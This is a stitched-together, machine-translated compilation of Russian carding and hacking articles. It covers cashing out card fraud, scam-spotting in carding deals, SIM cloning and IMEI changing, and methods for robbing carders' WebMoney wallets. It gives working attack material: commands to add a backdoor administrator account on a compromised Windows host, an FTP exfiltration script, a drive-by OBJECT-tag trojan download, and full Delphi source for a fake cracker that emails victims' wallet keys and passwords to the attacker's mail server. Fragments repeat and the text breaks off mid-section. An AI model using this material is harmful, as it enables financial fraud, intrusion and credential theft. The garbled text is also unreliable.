An ordinary account somewhere in Latvia is suitable for cashing out. With a special desire and extra money, you can open an account yourself, or you can buy a ready-made one. Most of the Baltic banks can open an account without a personal visit to them. To do this, you will need photocopies of some documents (which ones depend on the bank). Then they must be sent by mail or fax. If all goes well, you will receive an envelope containing a debit card (Visa Electron or Cirrus / Maestro) with a pin code, as well as instructions for online account management. Such an account will be very useful in the future. It will definitely pay off, unless, of course, you screw it up after the first transfer. In addition, now you no longer have to pay interest to the cashier, and it will be possible to cash out amounts less than $ 1000.
In the partner's rules, you must carefully read which countries he can make transfers to. If this is not in the rules, you will have to write a letter to the support service and ask about it. It may turn out that they only transfer money within the United States or another country.
In general, to cash out money you need:
- Have an account for cash out (your own or provided by the clerk).
- Have the required amount in an account with a partner.
- Exceed the initial hold (if any).
Two birds with one stone
If everything was done correctly, then in a month and a half, a certain amount of money will settle in your pocket. How long the project will run depends only on you and on the greed of the cardholders. In a month, the project can easily pay off, plus bring some profit. Then all the money will go into your pocket. But, as always, I want more money. And this, in principle, is not a problem.
Let's say you advertise your partner's hosting. And why throw honestly damaged goods in the trash? A much more reasonable solution would be to sell this hosting, for example, at half the price. Try to find people who will need it. If you sell it on carder forums, then it is better to immediately warn the buyer that the product is scarce in order to avoid further showdowns. Templates will sell better, because they already exist and will not be closed, such as hosting. The most profitable is, as I said, dedicated servers. They can be used for your own purposes.
In conclusion...
I tried to show that carding is still a creative process. The main thing is to believe in yourself, and then everything should work out. At first everything seems very complicated, but if you spend a little time, the picture quickly becomes clear. Of course, there will be surprises on the way, but it is impossible to tell about all of them. This is due to the fact that a lot is changing very quickly, and each company has its own rules and procedures. I think many will condemn me, saying that carding is illegal and immoral. I completely agree with this, therefore I do not urge anyone to do something like that.
But do not rush to the first site you come across, first go through different companies and study their conditions.
Well, the sweetest bit is dedicated servers (server rental). This pleasure is not cheap, therefore the interest will be rather big.
Website design must be solid. You shouldn't make flying stars or jumping hares, that is, everything that is popularly called pop music.
You will need SOCKS proxies. It is desirable that the proxies that you will use are of the same state as your cc.
It is best to buy debit cc, since the chargeback for them takes longer, 3-4 months.
An ordinary account somewhere in Latvia is suitable for cashing out. With a special desire and the presence of extra money, you can open an account yourself, or you can buy a ready-made one.
The basis of the problem of "kiddies" is created by gullible people who are deceiving, because in 90% of cases of deception, a person transfers money or provides services "forward", the bulk of those who are thrown in carding and in other areas are beginners who either do not fully understand what they are doing, which gives the scammer an additional chance to deceive the victim, raining in terms, or are too gullible, so if you have been deceived in most cases, you can enroll yourself in the ranks of beginners or gullible. Also, remember the phrase "a cheapskate pays twice" in the context of a scam, it is more relevant than ever.
How do they become scammers or what the deception begins with:
For the most part, scammers are those who could not achieve any success in what he and his entourage are doing.
As a result, a person who is disappointed sees that others earn something and he does not get anything. The thought immediately comes to mind - "why not take it from your own". Most often, the scammers are obtained from those who bought the enroll, tried to do things, it did not work out, but the enroll is not dead yet and he takes on some forum posts <sell enroll mbna>, a couple of people knock on him and he sells this to ALL of them enroll. It seems that there is no deception as such - everyone got what they wanted (we do not consider the factor of selling goods in several hands), however, with a very high probability, none of those who bought the roll will achieve anything and will join the flock of "offended and oppressed", this is the first stage.
Then, remembering the progress of transactions, he will again post <I sell enroll city> (since it is more expensive) 10 people will knock on him, of which 7 are normal and 3 are newbies, 7 will not want to work with him since he will not give a login and password in advance (he has they are not) and three will take it and buy it by translating wmz. Conclusion - the scammer will feel the money and will forever remain a fraud, even in further possibly honest transactions, the first thought he will have is <how can I cheat>.
Signs of deception and scammers:
The scammer wants to get money faster and he does not care about the outcome of the deal, since in case of a "successful" scenario, he will still be in the black, so the first characteristic feature of a scammer is haste, they come up with a bunch of side factors provoking the acceleration of the deal: a pregnant wife, blocking a wallet, anxiety drop and so on, you can think of a bunch of such "greases".
The scammer wants to show himself as a fumbling person, therefore, he constantly uses a large number of terms / special words too much.
like a cool carder threw <lives in usa> and he <a bum who has no money for a Russian keyboard>, therefore he writes in transliteration, but sometimes (with prolonged communication) phrases in Russian slip through. The standard answer if he is strained on this issue (theoretically) will be "I communicate with non-Russian-speaking partners", but he himself does not know one word either in English or in Chinese (this is easy to check by hitting him with another icq).
Throwing writes in exclusively in English - the first conclusion is that "he is a foreigner and not a mumu in Russian" such a conclusion usually immediately increases the level of trust. Also, the fact of not knowing the language, grammatical errors and constant smilies or signs of escaping emotions. Like "oh, how my hands itch, and a little bit more and I'll deceive and throw him away." In most cases, these are either real deer / housewives who do not speak Russian, or, as often happens, our compatriots are scammers. It is quite simple to check this, as in the above paragraph, to knock with another asi, the main options for knocking: offer him something that he cannot refuse, knock on behalf of <Masha>, who has all the info in the ace filled and who wants to meet, most often threw will bite.
Nickname scammers. Greed and incontinence often manifest in nicknames that change like gloves, but as soon as we see Express, Fast, Easy and so on, and even with the word loot, cash, cabbage, you should be careful and actually start checking a person.
icq number scammers. Now the six-digit icq numbers are not a sign of "coolness", so you cannot judge by the number. Similarly, with the date of registration on the forum - an example of this "bow" with cw on this basis, too, can not be judged.
The number of posts scammers - a potential scammer is either too small relative to the registration date, or, on the contrary, is very large (fills posts). Before making a deal with him, it is recommended to read what a person writes on the forums, and assess its adequacy, if this is a stupid number of posts, then make your own conclusion.
Inappropriate behavior / conversation - says a lot not about the case, says a lot about another matter, wants to do a lot with you right away, gets along with you. Also, scammers are very fond of yelling something like "did you throw?! Decided to throw me?" as they say measure people by themselves.
Phrases like “I don’t hang out on the forums, I work on order, etc.> this happens but rarely. The desire to work at once for large sums without preliminary verification and haste will say that the VY office will be closed or excuses that "you will burn a drop with test bays" also, in principle, indicates that you need to be careful.
They started making a lot of posts and attributed them at the end, I work only through a guarantor, but when a deal comes up, there are a lot of excuses and excuses, sometimes even calls in order to powder my brain.
Conclusion: none of the factors listed above can say that the person threw, but in aggregate they let you know that it is better not to deal with him, the general tactic of the scammers is to powder the victim's brain.
How to conduct transactions:
With unverified people exclusively through a guarantor, do not spare $ 10-20, even if the goods cost so much. If you are thrown, you will have a negative impression and the money will fall into the hands of the fraudster, which, as described above, will most likely prompt him to new deceptions, and if you pay the guarantor and make the deal successfully, then you will have a "verified" (not the fact that he will not throw you later for a larger amount) the seller and the guarantor will receive their honestly earned money, which in most cases will go to the development of forums - everyone will be happy.
In the case of working without a guarantor, work only with famous people or only if there are positive reviews (from verified participants in order to avoid the fact of self-writing of reviews). as a rule, beginners have a hard time in this situation, there is not much to show, they got the materials and I want to sell, in general, such a vicious circle and unfortunately a lot of capable beginners are either deceived or simply no one wants to work with them, in principle, to avoid such a fate, we advise you to start on the sly and without much show-off.
If you are not sure of a person, you should not torture him by imposing your cunning terms of the deal on him, look for another. Since by this you will form a brake on yourself from a normal person, and the scammer will not let you be thrown, thereby wasting your own and other people's time.
Yes, in principle, there are not enough options.
Or make transactions through guarantors or with trusted people, the options they say will give their guarantor can also very often turn out to be a fraud.
Option 50 is now 50 then it works more or less smoothly, although if the person did not throw, then giving all 100 ahead is not a problem.
To clarify who the person, especially the one knocking on you, is, be sure to ask him to send you a PM on the forum.
Today, yes, in general, as always, everyone wants freebies. This word has taken root in the minds of the Russian people. Everyone wants free metro rides, free parking near the store next to their home, free toilets, even free supermarket bags. Cellular communications are no exception. Only now in the mobile communications market this problem is losing its relevance, and in the early nineties it was very urgent. Nowadays, no one will spend 20-30 bucks a day on cellular communications - it is easier to buy an unlimited tariff, and ten years ago such a tariff per year cost the cost of a new business-class car.
And the people wanted it cheaper
The people wanted it cheaper, and the operators did not cut prices for many reasons - for which they literally paid. It was at that time that the so-called phreakers began to appear - telephone pirates. Many people think that if a neighbor Uncle Vasya from the seventh floor changed the firmware on his cell phone, then he automatically became a phreaker. Not. Real phreakers were experts in their field - at that time there were very few of them, but now they are practically none. These are graduates of the Moscow Engineering Physics Institute, the Bauman Moscow State Technical University and other strong universities, where programming, higher mathematics and electronics are not in the last places in the list of disciplines studied. They made the connection free of charge, which attracted the attention of the public and the relevant law enforcement agencies. It was then that the notorious Office "R" was created, dealing with crimes in the field of high technologies. Now such phreakers are not in demand, because their work does not pay off, and in the early nineties they easily earned an amount with four zeros and far from Russian rubles a day. It was those nineties that were marked by the recession of the Russian economy, then money was lying on the ground - they only needed to be raised, and phreakers raised.
Let me go to the Himalayas
It all started with the notorious Altai telephones, from which they called relatives in America. And for free and a lot, at the expense of people to whom they illegally connected. Then everything went to cell phones. With them, however, everything is more complicated - after all, a mobile phone has a SIM card, which the base station identifies and registers in the network by its number - and not by the cellular number. Of course, I mean the GSM standard. This number and all other important information (PIN, PUK, etc.) are encoded on the SIM card with a 128-bit key. The biggest challenge was figuring out this horrendously many-bit key. To do this at home can only be trivial. And that's what the real phreakers did. But more on that later, but for now I will tell you the necessary minimum of theory.
In general, the operator's entire coverage area is divided into relatively small cells (their diameter is on average 5 kilometers). In the city, as a rule, this distance is 600 meters, outside the city - about four kilometers. As soon as the subscriber moves from one cell to another with the phone turned on, he is registered by the base station of the cell on which he is currently located. The distance to the nearest base station is easy to determine. In many devices, this unique option is hidden, you just need to find it. A mobile phone is identified differently: each device has a fifteen-digit serial number - IMEI. The first fourteen digits of this number are fixedly set during firmware, the fifteenth is generated pseudo-randomly. All phones have different IMEI initially; it has nothing to do with the definition and registration in the network. It is needed in order to find out the owner of the device, if necessary. But this is much more time-consuming and thankless task than locating the currently active
SIM card. The serial number of a mobile phone speaks volumes. By it you can find out the number of the party to which this phone belongs. And according to the batch number - "gray" this cell or not.
SIMEdit and RS-232
There have been many legends about SIM card flashing. Some of these legends have nothing to do with the flashing itself. Re-flashing, or cloning, a SIM card is actually not a laborious process, but it requires a lot of material costs, straight hands, a bright mind and a lot of free time. Very often I heard stories that people created an image of a SIM card, having in their hands only sets of PIN and PUK codes from this same SIM card, and then using an RS-232 cable they easily reflashed it in the phone itself. That's bullshit. At the moment, I do not know a person who could reflash a SIM card remotely, and probably never will.
Also mentioned was the SIMEdit program, which can "absolutely" everything, in fact it turned out to be an ordinary phone book editor, wooden and not free. You can find out the same 128-bit key of a SIM card only with the help of a powerful cryptanalyzer (the cost of which is exorbitant for the average user), and in no less than 10 hours. There is one more "but": during these ten, or maybe more hours, there is a strong load on the SIM, and some copies of the cards do not withstand this and burn out.
Hot spring forty-fifth
In other words, with you, for at least half a day, you need to have a friend's SIM card, which must survive, because she still has to work. But such nuances did not stop phreakers, on the contrary, they inspired them. They found sim cards, made their images and threw out hundreds of burned ones. Telephone hackers were not even stopped by the fact that you can only make calls from a flashed card, not receive them. At that time, a minute, by today's standards, was very expensive, and this business was worth it.
In May 2002, a statement appeared in the Russian media that specialists from IBM were able to crack the SIM card code using only publicly available electronic devices in a few minutes. Those. any uncle Vasya, whom I mentioned earlier, can hack SIM cards with one soldering iron in five minutes. Naturally, no one liked this alignment. Immediately after this phenomenal discovery (it is not a fact, by the way, that it was a discovery - we were not stupid either), according to the technology proposed by IBM, an auxiliary, randomly generated one was added to the code matrix, which strengthened the protection of the SIM card by an order of magnitude and covered the discovered hole. By this time, phreaking had gradually outlived its usefulness.
With telephones of the DAMPS, AMPS, etc. standard, things were much easier. Information about the SIM card is stored in the phone's non-volatile memory - eeprom. To make a "double" of such a phone, you just need to change the IMEI, which, by the way, is not encrypted in any way.
No pain, no game
Hackers were caught and imprisoned. There were few of them, and it was not difficult to catch them. They were sent dummies under the guise of buyers, and then taken red-handed. There were a lot more people who used left-hand SIM cards, and it was more difficult to put them in. They had nothing to show. And Office "R" had to improve the detection of telephone crimes, because there were a lot of statements. The operators themselves tried to fight the hackers. A lot of people turned to the central offices with the question: "Where did I get such huge sums and incomprehensible phone numbers in my invoice printouts?" The subscriber was doubly compensated for the stolen amount, asked to cross out their phones and began to work with the rest. They tried to find the "doubles" using these numbers, but, naturally, these operational-search measures did not produce any results. It was like that at the very beginning nowadays, such problems can arise due to the inaccuracy of billing systems. But until now, it remains
a mystery to me why operators always benefit from this.
The pioneer is always ready, like Gagarin and Titov
But as time went on, it became much more difficult to pick up money from the floor, especially while sitting. It was necessary to look for more legal methods. Legal in the sense that there are no laws on this in the Criminal Code. A new wave of phreakers has entered the communications market, which cannot be called phreakers. There are a lot of them. They just knew how to stupidly unlock cell phones and their subsequent Russification by pressing keys on the keyboard in a certain order. They did not have any baggage of knowledge, how to do it, they were told by smart people, who, for the most part, were polishing bunks by that time.
A little earlier it was expensive to unlock a phone: there are about 40-50 American presidents at retail. The devices were much more expensive in Russia than in the West. They were taken from there. Here the phones were flashed for our networks. It was at that time that the concept of a "gray" phone appeared. Now there are practically no “grays”, although sometimes you can see large parties in Moscow. But not of the then scale, when certified equipment was sold only in the offices of operators. Then a lot of green phreakers came, and prices began to plummet: literally up to two or three dollars apiece. Everyone wanted to snatch their piece, and the non-rubber cake had to be divided into a huge number of people. Then for those who were not in the know (and there were the overwhelming majority of them), unlocking the phone was on the same level of difficulty as flashing the SIM card. They were practically right but this level was the very last for them. When a citizen found out that “that guy in a red T-shirt is reflashing phones,” he immediately felt deep respect for this person.
Serial numbers
Using the information about mobile phones, which is currently on the Internet, you can do anything with almost any phone. You can block the cell phone on the network, on a separate SIM card, remove the lock code from the phone, change the IMEI and much more. By the way, about IMEI. Once an unpleasant story happened to my friend. At the institute, her phone was stolen, and she contacted the operator's office with a question about the possibility of returning her cell phone. The operator said it was not a question. He explained that you only need to file a statement with the police, and he (the operator) himself will find the device by the serial number of the phone, because each number is unique. They told her quite seriously that IMEI cannot be changed, when I literally a few hours earlier changed the first eleven digits of the mobile serial number to my cell phone number in the international format. That is why at the very beginning I said that IMEI is different for all phones only initially, at the
stage of their release from the assembly line.
Then you can find a phone with the same serial number as yours, and more than one. It has been suggested that cellular operators are simply pretending that they are not in the know.
Flash, eeprom and other scary words
As I said, jailbreaking a phone is simple, as easy as getting the software for it. To make a cell phone work in the required quality, you need to change its memory, i.e. reflash it. I'm talking about the phone's flash memory. Just not about the flash that you put into a digital camera or mp3-player, and not about the one that you see on the Internet. Phone flash is almost the same as the operating system of a computer. This is all the telephone menu, games, calculator, dictaphone, etc. This memory is like a nesting doll, which is sold on the Old Arbat. The largest is flash, it includes eeprom, which is much smaller. The eeprom contains all the information on the phone lock codes, device settings and other necessary gizmos. And the very last one is the memory containing the IMEI and the date of the phone's release - it, in turn, is part of the eeprom. For the Russification of the phone, changes are made in the entire flash, for unlocking the phone or changing the serial number - in the eeprom. Flash weighs
on average 14 megabytes, eeprom - 53 kilobytes, so to unlock the phone it is easier to pump out the eeprom from the device, and work with it further. The only caveat is checking the checksum. If you erase something necessary or add unnecessary in the flash, the phone will refuse to work at best.
Universal program
It was necessary to find software that would download flash from the phone, and then download it back. Previously, these programs were a terrible secret, many did not even know what they were called, some did them on their own, but this did not change the essence. Now I will tell you about the program for working with Siemens phones. A monument was erected to the guys-developers of this program during their lifetime. This thing is called Unisiemens, you can get it anywhere on the Internet, and it's easy to use. With its help, you can download both flash and eeprom, and even a piece of flash from a specific address, and then upload it all back.
There are two ways to jailbreak your phone. The easiest way: download from the same, but not unlocked, eeprom phone and upload it to the locked one. The most difficult way: merge eeprom from a locked phone - it will be a regular binary, and deal with it in a hexadecimal editor. I once chose HexEditor - it still lies in my place of honor. The choice is yours. The IMEI of the phone changes in almost the same way, although there are slightly other programs for this, but they are also easy to get on the Internet, and even easier to use.
The very first unlocked phone I had was my own. I blocked it, and then reflashed it. I was very afraid for him - it cost more than three hundred bucks, and I didn't want to buy another one. But everything went fine. And after that I was no longer afraid of anything.
And we do not dream of the roar of the cosmodrome
But phreakers were engaged not only in unlocking devices and duplicating SIM-cards. At that time, there was the possibility of listening to conversations on mobile phones. The equipment cost about fifty to one hundred thousand dollars. The main thing is that there were orders, however, for subscribers it was necessary to run within one cell. The encryption of the then GSM, which, by the way, was almost nonexistent, was several orders of magnitude weaker than the encryption of today's GSM. Earlier, the operators did not think about the possibility of such cases until they planted a couple of "spies". Now cellular communication is practically safe: even operators themselves cannot listen to subscribers. But it happens that operators remove encryption from the network. Probably everyone remembers the recent terrorist attack in Tushino during the Wings holiday. On that day, on the territory of the airfield where the holiday took place, all base stations were turned off until the evening. In other words, an
information cap has formed, blocking the services of all Moscow mobile operators. Literally in the following days all over Moscow, by order of the government, the encryption of conversations on all cell phones of the GSM standard was turned off. Then the subscribers were able to feel in the ninety-third for three days.
And now…
Now, for the reasons I described above, the telephone freak has become history. Today, the protection of cellular networks and SIM-cards is completely different, several orders of magnitude stronger, another time, different concepts. Those phreakers knew that it was only at the first stage of the emergence of cellular communications in Russia that big money could be made. They knew that times like these would pass quickly. And those who were more cunning, grabbed the most and then did not regret anything. At least they had enough for bread and caviar.
Now the days of telephones the size of a two-cassette VCR have passed, and the price of a minute of conversation has dropped from five American dollars to SMS for one American cent. For a long time no one reflishes SIM-cards, but on Mitino it is not clear where the numbers of prepaid cards, written in columns on sheets of paper, come from. But this is already an informational freak, which is firmly taking the place of the telephone one.
Today, the protection of cellular networks and SIM-cards is completely different, several orders of magnitude stronger, another time, different concepts.
I think you are impatient to do something with your phone, and you are reluctant to deal with flash manually. I can see and understand by the eyes. You probably already want to change a few numbers of the serial number of your phone for the year of your birth. Today I will give you this unique opportunity. Since we mentioned Siemens in the article, we will work with it. Get ready to become a real phreaker.
Are you ready? Go. In order to change the IMEI of your phone, you need:
- Turn on the computer.
- Have in hand a cell phone and an RS-232 cable connected to a computer.
- Install the Siemens Unlock program from the disk attached to the magazine.
- Launch the program and select the model of your cell phone.
- Go to Service> Unblock / Change IMEI.
- Enter the desired IMEI and press the change button.
As you have already noticed, the functions of the program are not limited to this. Hope you get the hint. And finally: if all this is very interesting to you, go to ftp://vts.vlad.ru/pub/. You will definitely find something there for your phone.
How the rich are robbed
All people earn their living. And in different ways. Some people choose virtual enrichment. At the same time, the earnings themselves are not always fair. A person takes risks, conducts important banking transactions, sells credit cards, buys various things and at some point he loses everything. Due to his own inattention, the hacker Vasya from Mukhosransk completely cleanses him. Why is this happening, and how does a cracker manage to attack seemingly protected carders? Let's try to figure it out.
Let's tame the system!
There are many ways to steal valuable information and carder's savings. But it is worth making a reservation that the main thing in this matter is not quantity, but quality, that is, the successful application of these methods.
So, it's time to tell you how a hacker can steal data from a victim. Firstly, this is hacking the computer of a rich Pinocchio. Here - how lucky you are, nothing can be said for sure. If a person is a rascal and does not read bugtracks, then the chances of a hacker increase dramatically. Otherwise, and even with a firewall installed on the machine, this method is unsuitable.
How do users' workstations break down? There are also ways here. Let's dwell on the backbone WinNT. Have you always thought that if Windows has the NT prefix, then it has one hundred percent protection? I will disappoint you. Very dangerous bugs have been found on such platforms.
RPC outbreak
If you do not know about the RPC vulnerability, then you have a late ignition. This bug was trumpeted by all security portals, and many exploits were released, including those for Windows (a paradise for scriptdis). How can a hacker get money from a naive bourgeois who, probably, does not know about the existence of a patch from RPC bugs? Very simple. It is enough to seize access to his system and type a number of console commands. After that, all important documents will be in the hands of the attacker.
I will not teach you how to exploit vulnerability. Various hacker portals wrote about this, as well as Hacker # 9. I will just draw your attention to the commands that can be useful to a cracker who seized the rights on the victim's system.
To avoid using a noisy exploit (which, by the way, can destroy RPC calls and crash the system) every time, you can create an administrator account. As you know, it will be used for resources such as C $, D $ and others. This is very easy to do. You just need to type the following lines:
net user admin nimda / add (add a new user admin with the password nimda, you can substitute your own parameters).
net localgroup Administrators admin / add (assign the Administratots group to the user).
If the platform is not localized in English, you must substitute the name of the group in your native language. To do this, the hacker types "net user" and finds out the true name of the group.
If everything was done correctly (the net command will definitely inform the hacker about the result of the operation), the attacker can log into the machine from the local computer. The command "net use z: \\ IP-ADDRESS \ C $" helps him in this. But he will never do this for one simple reason - logs are kept on the machine, and his IP address will definitely be recorded. But there is a way out - the hacker doesn’t come from himself, but from his favorite scanned shell.
smbclient // IP-ADDRESS / $ C -U admin
This command is relevant for Linux. After prompting for a password, the hacker enters the $ C system resource (in order to perform such actions, the cracker pre-installs the samba package on the machine).
But sometimes simple directory access isn't enough. For example, in the case when it is necessary to trace the user or put a keylogger on the machine (as well as view the list of processes, kill one of them, etc., etc.). In this case, the attacker either installs an additional backdoor or uses an exploit every time.
Who seeks will always find
There is nothing tricky about finding information. If a hacker is impatient (and there are few of them), he simply fumbles through the folders and downloads files with suspicious names (such as 1111.doc or paroli.doc). Textbooks can be read in place with the "type file" command. Many guides on how to hack Windows write about a required account on some TFTP server. However, you can perform the operation via the regular ftp command. A script is prepared in advance, which consists of simple operations transmitted by ftp. For example, it might look like this:
sample FTP script
user vasya vasya123
type binary
put document.doc /xakep/document.doc
quit
After the script is composed (script commands are sequentially written to a file using echo and standard input redirection), it is passed to the console utility using the -s: filename parameter. It should be borne in mind that the authentication was performed in one command, so we add the -n option to the command line.
It should be noted that Windows does not have a search command, which is present in Linux. But this does not mean at all that it is impossible to find the file in the console. The subject of the hunt for a hacker is WebMoney wallets, which have the kwm and pwm extensions. They can be found with the following command:
Code:
dir / S c: \ | find *.? wm
This will recursively list all directories from the c: \ drive and then filter the files using the find command.
WebMoney is a hacker's joy
After the WebMoney wallets have been downloaded, you need to find out the account ID (this will be done by the client), as well as the login password. The password on WebMoney cannot be changed and is set only once (analogous to the PIN-code in a credit card), so the user may have written it down in a file so as not to forget. With a lucky coincidence, the hacker pulls this file and wallets and completely takes over the victim's account. Attention! This is very dangerous, since the money transfer system has a history of all transactions performed. I will say from experience that burglars have their own people who launder money in the account, taking a certain percentage of the amount for services.
There are other ways to get a password. For example, this: the hacker managed to find out several passwords that the victim uses on the Internet. He tries to iterate over all of them and, perhaps, one of them will be correct. When there is no way left, you can find a suitable keylogger that sends a keyboard dump to an enemy e-mail address. After it is launched on the computer, all that remains is to wait until the user uses the WebMoney client. There is a way to speed up this process - sending a letter to the victim stating that the wallet has been replenished by a certain amount. Then he will definitely launch the client.
In general, there is one more method of taking possession of a WM purse. It is practiced among wealthy, but lamented individuals who recently but successfully comprehend carder shenanigans. A program is being created, such as an "Internet cracker", but it does not crack the Internet, but takes away WebMoney wallets. To implement it is a trifle, the problem is different - to sell a program to the victim. A good hacker with extensive experience in social engineering can do this.
You can find the source code for this little program in the sidebar. The complete source of the project is on disk.
In addition to the WebMoney service itself, there is the Merchant service (
http://merchant.webmoney.ru), which is needed to conduct online transactions to transfer money from one WM purse to another. Typically, the service is used in various projects, for example, online stores. If a hacker breaks into such a resource, he simply replaces the link and parameters to his WebMoney wallet in the script source code. In this case, the client will send money to the attacker's account. Undoubtedly, this will soon be noticed, but the burglar will have time to enrich himself.
Holes in the donkey
The RPC vulnerability is far from the only bug in the vents. Let's look at another example - an error in the processing of the <OBJECT> tag, which allows arbitrary code to be executed on the client machine. Having implemented such a vulnerability, it costs a hacker nothing to inject a Trojan on the victim, and even log his IP address, which will later be checked for infection with a backdoor.
To write an exploit, you just need to create the following html document:
Code:
<object data = "/ object.html"> Hello everyone </object>
And put a script in object.html, for example, in Visual Basic. It will download the Trojan to the specified address and then launch it. If you wish, you can fantasize about writing the backdoor to the registry (unless, of course, such a function is already implemented in it), but these are exclusively the hacker's problems.
To write the IP address to the log file, you need to write a simple perl script. For example, something like this:
Perl script to write the address to the log
Code:
#! / usr / bin / perl
print "Content-type: text / html \ n \ n";
$ ip = $ ENV {REMOTE_ADDR};
open (LOG, ">> ipz.log");
print LOG "$ ip \ n";
close (LOG);
This script is redirected from the main page, or an SSI tab is called, for example, the following:
Code:
<! - # exec cgi = "/ path / to / iplog.cgi" ->.
It should be remembered that in order to perform SSI inserts, the file must be given the shtml extension. As for the files to be recorded (ipz.log), they must have the 666 attribute.
The idea behind this method is to send malicious programs to the victim's computer using gaps in the operating system. You can find a regularly updated list of vulnerabilities on any security portal.
What about Linux?
As far as Linux is concerned, all the methods of this seemingly unapproachable system were described in the article of this issue "Find and Get It!" In this system, you can find, perhaps, only credit cards and files that store passwords, as well as accounts for any resources.
An effective way to steal information is data sniffing. Snifer is a program that intercepts all traffic on certain interfaces and selects information from it, which is indicated in the snifak config. There are quite a few programs that intercept all traffic and write it to logs (while filtering remains a hacker's problem). Basically, sniffers are conveniently configured and run discreetly on the server.
The principle of all sniffers is based, as I said, on the interception of data on a specific network interface. This sets the promisc mode, in which all data passes through the network card, despite the fact that they were intended for other machines. You probably guess that you can successfully use a sniffer only on computers that function as routers. If so, the hacker will intercept all traffic on the local network.
Recently, sniffers have been written by very literate people. They cannot be detected by any utilities such as ps, ifconfig, IDS and others.
Another interesting way to hack is to brute force (brute force) passwords for a specific service. I've heard of private projects like the https account brute-force. Thus, it is quite possible to hack a businessman's account on any security service.
I'm not even talking about brute-force passwords on unsafe services that lend themselves to sniffing. There are a lot of such brute-forcers on the Internet, and most of them support multithreaded brute-force. Gone are the days when root / root or admin / admin pairs were used as accounts, but dictionary passwords are very common. So it becomes quite real to guess the password.
Thus, to summarize. Account theft is a hot topic. They steal all and sundry, and that which lies badly. Therefore, if you are a successful networked businessman, I recommend protecting your system with the necessary patches, as well as a well-configured firewall. Only then will you be absolutely safe.
Coding
It's time to present a project that implements the "crack" of WebMoney wallets. In fact, this fake program simply sends all the keys and password to the attacker's soap.
To implement the plan, the following components are required:
5 Label (text, Standard tab), 5 Edit (input text, Standard tab), 3 Button (button, Standard tab), Memo (Text field, Standard tab) and ProgressBar (Win32 tab), as well as NMSMTP components (FastNet tab ) and OpenDialog (Dialogs tab).
We assign caption to buttons and text fields.
Label1.Caption: = 'WM (Webmoney Identifier)';
Label2.Caption: = 'Wallet (Example: Z143365768493)';
Label3.Caption: = 'WM Password';
Label4.Caption: = 'Path to the key file';
Label5.Caption: = 'Amount to transfer';
then to the buttons:
Button1.Caption: = 'Browse';
Button2.Caption: = 'Generate';
Button3.Caption: = 'Cancel';
Set the text to the Memo field, also through variables:
memo1.text: = 'Note:' + # 13 # 10 +
'The size of the key file should be as small as possible. the program changes its content and uploads it to the server. '+ # 13 # 10 +
'If the size is more than 1 megabyte, then WebMoney will notice among its' + # 13 # 10 +
'keys are yours, which is large.';
Events for pressed buttons:
Code:
// Overview
procedure TForm1.Button1Click (Sender: TObject);
begin
// if the dialog is successfully launched then
if opendialog1.Execute then
// write the file name
Edit4.Text: = opendialog1.FileName;
end;
// Generate
procedure TForm1.Button2Click (Sender: TObject);
begin
// ProgressBar1 - change the position of the progress bar slider
ProgressBar1.Position: = 0;
// Attached files
NMSMTP1.PostMessage.Attachments.Text: = Edit4.text;
ProgressBar1.Position: = ProgressBar1.Position + 10;
// Body of the sent message
NMSMTP1.PostMessage.Body.Text: = 'WmCrack 9.1.2 PRO Message' + # 13 # 10 +
'Some lame use you programm ...' + # 13 # 10 +
'WM ID:' + Edit1.text + # 13 # 10 +
'Z or E or R:' + Edit2.text + # 13 # 10 +
'Pass :' + edit3.text + # 13 # 10 +
'File.kwm:' + Edit4.text + # 13 # 10 +
'Money:' + Edit5.text;
ProgressBar1.Position: = ProgressBar1.Position + 10;
// Letter subject
NMSMTP1.PostMessage.Subject: = '>>> WMCRACK *************';
ProgressBar1.Position: = ProgressBar1.Position + 10;
// The name of the program that sent the letter
NMSMTP1.PostMessage.LocalProgram: = 'SomeShit';
ProgressBar1.Position: = ProgressBar1.Position + 10;
// Reply-To address
NMSMTP1.PostMessage.ReplyTo: = ' [email protected] ';
ProgressBar1.Position: = ProgressBar1.Position + 10;
// Sender mail
NMSMTP1.PostMessage.FromAddress: = ' [email protected] ';
ProgressBar1.Position: = ProgressBar1.Position + 10;
// Sender name
NMSMTP1.PostMessage.FromName: = ': WMCrack:';
ProgressBar1.Position: = ProgressBar1.Position + 10;
// E-mail of the hacker
NMSMTP1.PostMessage.ToAddress.text: = ' [email protected] ';
ProgressBar1.Position: = ProgressBar1.Position + 10;
// hacker's SMTP server
NMSMTP1.Host: = 'i-have.cc';
ProgressBar1.Position: = ProgressBar1.Position + 10;
// Sending a letter
NMSMTP1.SendMail;
ProgressBar1.Position: = 100;
// Message about the successful sending of money to the victim
Showmessage ('Update your WM Keeper, the amount should be received within 1-2 minutes.');
end;
// Cancel
procedure TForm1.Button3Click (Sender: TObject);
begin
NMSMTP1.Abort;
// Set the progress bar to 0
ProgressBar1.Position: = 0;
end;
Sniffer overview
As I said, the internet is full of sniffers. At first glance, it is not so easy to understand them, so I am publishing a small review of sniffer programs.
Sniffit. One of the first sniffers that is still very popular. It saves the first 400 bytes of the packet by default, but a hacker can configure it to intercept the victim's password.
TCPdump. The famous sniffer. Considered a professional administrative tool.
ADMsniff. A well-known, highly skilled group of ADM hackers wrote an excellent sniffer. I definitely advise you to take a look, tk. everything they do is worth your attention.
Linsniffer. Popular sniffer designed for Linux platforms.
Sunsniff. This sniffer is made for the SunOS platform. Perhaps one of the most famous sniffers, made almost ten years ago.
Broke?
If you find yourself in the clutches of a hacker, then perhaps you have gaps in your operating system. Be sure to read bugtraq and patch your system on time. You can get them at
www.microsoft.com/.
There are many ways to steal valuable information and carder's savings.
I will not teach you how to exploit vulnerability. Various hacker portals wrote about this, as well as Hacker # 9. I will just draw your attention to the commands that can be useful to a cracker who seized the rights on the victim's system.
There is nothing tricky about finding information. If a hacker is impatient (and there are few of them), he simply fumbles through the folders and downloads files with suspicious names (such as 1111.doc or paroli.doc). Textbooks can be read in place with the "type file" command.
If a hacker breaks into such a resource, he simply replaces the link and parameters to his WebMoney wallet in the script source code.
It should be remembered that in order to perform SSI inserts, the file must be given the shtml extension.
An effective way to steal information is data sniffing. Snifer is a program that intercepts all traffic on certain interfaces and selects information from it, which is indicated in the sniffer config.
Another interesting way to hack is to brute force (brute force) passwords for a specific service. I've heard of private projects like the https account brute-force.
Personal pseudo-site of the carder
Some individuals do nothing and receive real income. No start-up capital, from absolute zero. And everyone can repeat their experience, even you. This requires desire, luck and a little patience. I will tell you about a profitable business built on pseudo sites.
What are pseudosites
